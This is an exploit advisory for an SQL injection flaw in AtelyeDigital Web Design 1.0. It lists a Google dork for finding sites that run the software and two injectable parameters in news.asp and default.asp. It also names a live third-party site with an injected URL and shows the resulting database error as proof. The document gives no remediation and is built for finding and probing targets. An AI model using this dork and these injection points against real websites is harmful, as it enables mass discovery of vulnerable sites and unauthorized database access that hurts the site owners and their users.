#########################################################

# Exploit Title : AtelyeDigital Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : atelyedigital.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060019

#########################################################

AtelyeDigital.Com Web Design and Development SQL Injection Vulnerability

#########################################################

# Google Dork : intext:''Atelye Digital''

# Exploit : /news.asp?id=[SQL Injection]

# Exploit : /default.asp?Kno=[SQL Injection]

#########################################################

# Example Site =>

thedem.com.tr/tr/news/news.asp?id=116%27

=> [ Proof of Concept for SQL Inj ] => archive.is/08T1s

# SQL-DB Error =>

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error in string in query expression 'id = 116''.
/tr/news/news.asp, line 18

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################